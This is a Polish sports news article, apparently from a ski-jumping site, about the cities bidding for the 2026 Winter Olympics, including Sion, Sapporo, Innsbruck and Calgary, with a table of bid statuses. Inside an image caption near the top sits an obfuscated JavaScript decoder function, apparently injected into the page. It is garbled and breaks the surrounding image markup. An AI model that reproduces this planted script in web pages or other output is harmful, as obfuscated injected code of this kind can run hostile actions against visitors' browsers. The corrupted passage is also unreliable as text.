You are currently viewing Zimowe Igrzyska Olimpijskie 2026 – kto powalczy o organizację?

Zimowe Igrzyska Olimpijskie 2026 – kto powalczy o organizację?

igrzyska kola olimpijskie - Zimowe Igrzyska Olimpijskie 2026 - kto powalczy o organizację?Podczas gdy sportowcy i kibice wyczekują zbliżających się XXIII Zimowych Igrzysk Olimpijskich, które w lutym 2018 roku odbędą się w koreańskim PyeongChang, już pojawiają się pierwsze propozycje na lokalizację zmagań w 2026 roku. Czy olimpijska rywalizacja powróci do Europy? A może szansę na start w Japonii dostanie 53-letni Noriaki Kasai?

 

Szwajcarzy z pierwszą oficjalną kandydaturą

- Zimowe Igrzyska Olimpijskie 2026 - kto powalczy o organizację?function u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4>4);p7=((y6&15)>2);w9=((p9&3)=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0andydat do organizacji ZIO 2026" src="http://www.skokipolska.pl/wp-content/uploads/2017/05/Zimowe.Igrzyska.Olimpijskie.2026.Sion_ZIO-300x200.jpg" alt="Sion - pierwszy oficjalny kandydat do organizacji ZIO 2026" width="300" height="200" /> Sion - pierwszy oficjalny kandydat do organizacji ZIO 2026

Jak dotąd tylko jedna miejscowość oficjalnie zgłosiła swoją kandydaturę do organizacji XXV Zimowych Igrzysk Olimpijskich. Mowa tu o położonym w południowo-zachodniej Szwajcarii mieście Sion. Pozytywną decyzję Szwajcarskiego Parlamentu Sportu w kwestii aplikacji poprzedziły analizy związane z ewentualnymi finansowymi skutkami dla kantonu Valais, którego stolicą jest właśnie Sion. Według ekspertów, tak wielkie sportowe wydarzenie nie tylko nie obciąży tamtejszej gospodarki, a będzie dla niej pozytywnym impulsem dającym szansę na rozwój i zyski. Co więcej, wśród mieszkańców ponad 30-tysięcznego miasta położonego w dolinie rzeki Rodan przeprowadzono internetową ankietę, w której dwie trzecie badanych opowiedziało się za organizacją olimpijskich zmagań w 2026 roku. Szwajcarów czeka jeszcze regionalne referendum, które odbędzie się w październiku 2018 roku i będzie jedną z kluczowych decyzji w związku z kandydaturą.

Przypomnijmy, że do tej pory Szwajcaria dwukrotnie gościła zimowe igrzyska olimpijskie. W 1928 oraz 1948 roku sportowcy rywalizowali w słynnym ośrodku sportów zimowych w Sankt Moritz. Po złote medale w konkursach skoków sięgali wówczas Norwegowie - Alf Andersen i Petter Hugsted. Swojego dorobku medalowego w 2026 roku w Sionie (a właściwie Kanderstegu, gdzie miałyby zostać rozegrane konkursy skoków) nie powiększyłby jednakże jedyny jak dotąd (czterokrotny) szwajcarski mistrz olimpijski w tej konkurencji, Simon Ammann, który będzie miał wówczas 44 lata, a z decyzją o zakończeniu kariery nosi się już od kilku sezonów. Do tego czasu Helweci będą więc musieli poważnie popracować nad solidnymi następcami złotego medalisty z Salt Lake City i Vancouver.

 

Kasai poskacze do 2026 roku?

DSC 1609 300x198 - Zimowe Igrzyska Olimpijskie 2026 - kto powalczy o organizację?
Noriaki Kasai (fot. Przemek Wardęga)

Nie jest jednak wykluczone, że w 2026 roku na ojczystej ziemi poskacze inny z narciarskich weteranów. Mowa tu o "niezniszczalnym" Noriakim Kasaim, który jeszcze w 2015 roku zapewnił, że zamierza wesprzeć kandydaturę Sapporo. - Kiedy skończyłem czterdzieści lat, zdecydowałem, że decyzję o zakończeniu kariery ogłoszę w wieku lat 50. Ale teraz Sapporo, moje rodzinne miasto, stara się o organizację igrzysk olimpijskich w 2026 roku. Będę miał wtedy 54 lata, ale to zbyt duża szansa, by się poddać. Dobre rezultaty w międzynarodowych zawodach oraz podkreślanie mojego związku z Sapporo mogą pomóc miastu w batalii o olimpijskie rozgrywki - mówił wtedy mistrz z Kraju Kwitnącej Wiśni.

Największe japońskie miasto położone na wyspie Hokkaido było już organizatorem zimowych igrzysk w 1972 roku. Wówczas po złote krążki sięgnęli reprezentant gospodarzy Yukio Kasaya, a także sensacyjnie Polak Wojciech Fortuna, który zaskoczył cały narciarski świat. Może Okurayama ponownie okaże się szczęśliwa dla biało-czerwonych?

 

Kto jeszcze może powalczyć?

Innsbruck Bergisel TCS.2015 fot.Julia .Piatkowska 300x200 - Zimowe Igrzyska Olimpijskie 2026 - kto powalczy o organizację?
Widok na olimpijską skocznię Bergisel w Innsbrucku (fot. Julia Piątkowska)

W gronie poważnych przyszłych kandydatur, które mają wsparcie rodzimych komitetów olimpijskich można wymienić także choćby austriacki Innsbruck, który był już organizatorem zimowych igrzysk w 1964 oraz 1976 roku. Aktualnie w Tyrolu trwają badania związane ze sprawdzeniem opłacalności rozegrania tak wielkiego sportowego wydarzenia. Walkę o igrzyska olimpijskie zapowiedziało także tureckie Erzurum. Dla położonego na Bliskim Wschodzie państwa byłby to debiut w organizacji zimowej imprezy tej rangi. Przeciwko Turcji przemawia jednak niestabilna sytuacja wewnętrzna, która mogłaby być zagrożeniem dla przebywających tam sportowców i kibiców.

Poza kandydaturami europejskimi i wspomnianym Sapporo położonym na kontynencie azjatyckim, swoich sił chciałyby spróbować miasta z obu Ameryk. Przedstawicielem północy może zostać kanadyjskie Calgary, które ma w planach ponowne zapalenie olimpijskiego znicza, który zapłonął tam w 1988 roku. Wówczas na kartach historii zapisał się fenomenalny Fin Matti Nykaenen, który zgarnął komplet trzech złotych medali. Dodajmy, że igrzyska ponownie zawitały w Kanadzie w 2010 roku (w Vancouver). Jak się okazuje, także Ameryka Południowa także ma szansę na posiadanie oficjalnego kandydata do organizacji największego sportowego wydarzenia na świecie. O olimpijskie zmagania w 2026 roku może powalczyć Argentyna! Wśród miejsc, w których mogłaby zagościć rywalizacja najczęściej wymieniane jest miasto Ushuaia usytuowane w Andach.

Wśród potencjalnych ofert do organizacji XXV Zimowych Igrzysk Olimpijskich znajdują się także miasta, które wcześniej planowały walkę o organizację tej imprezy w 2022 roku, czyli kazachskie Ałmaty i ukraiński Lwów. Istnieją także plany związane z kandydaturą norweskiego Trondheim.

 

Kto zrezygnował?

Wcześniej z batalii o organizację olimpijskich zmagań w 2026 roku wycofała się spora liczba miast. Powodem takich decyzji przeważnie były kwestie związane z finansami i niewystarczająco rozbudowaną infrastrukturą. Za 9 lat skoczkowie narciarscy i inni sportowcy rywalizujący na białym puchu i taflach nie zmierzą się z pewnością w Sztokholmie. To jednak właśnie szwedzka kandydatura była na najwyższym poziomie zaangażowania wśród miast, które ostatecznie zrezygnowały z walki o igrzyska. Wśród krajów nordyckich istniał także wspólnych fińsko-norweski projekt na rozegranie wielkiego sportowego święta w Helsinkach i Lillehammer. Pomysł ten upadł jednak niemal tak szybko, jak się pojawił. Poniżej podajemy wszystkie dotychczasowe - zarówno te prawdopodobne, jak i nieco mniej realne kandydatury - które wciąż istnieją lub już zostały zaniechane. Jednego jak dotąd jesteśmy pewni - ZIO w 2022 roku odbędą się w stolicy Chin - Pekinie, a decyzja o tym, kto zostanie organizatorem XXV Zimowych Igrzysk Olimpijskich zapadnie w 2019 roku podczas 132. sesji Międzynarodowego Komitetu Olimpijskiego.

miejscowość (kraj)
status
Sion (Szwajcaria)
oficjalna kandydatura
Ałmaty (Kazachstan)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Calgary (Kanada)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Erzurum (Turcja)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Innsbruck (Austria)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Sapporo (Japonia)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Ałmaty (Kazachstan)
potencjalna kandydatura ze wsparciem krajowego komitetu olimpijskiego
Santiago / Punta Arenas (Chile)
potencjalna kandydatura
Trondheim (Norwegia)
potencjalna kandydatura
Aosta (Włochy)
anulowana potencjalna kandydatura
Auckland / Queenstown (Nowa Zelandia)
anulowana potencjalna kandydatura
Barcelona (Hiszpania)
anulowana potencjalna kandydatura
Boston (USA)
anulowana potencjalna kandydatura
Drezno (Niemcy)
anulowana potencjalna kandydatura
Gryzonia (Szwajcaria)
anulowana potencjalna kandydatura
Helsinki (Finlandia) / Lillehammer (Norwegia)
anulowana potencjalna kandydatura
Quebec (Kanada)
anulowana potencjalna kandydatura
Sztokholm (Szwecja)
anulowana potencjalna kandydatura

Z niemal 100-procentową pewnością możemy wykluczyć "biało-czerwoną" kandydaturę. Olimpijskie aspiracje związane z igrzyskami w 2022 roku już w 2014 roku zostały rozwiane po referendum, w którym mieszkańcy Krakowa opowiedzieli się przeciwko organizacji ZIO.

 

źródło: delo.si / wikipedia.org / informacja własna

 
Podziel się:

Dodaj komentarz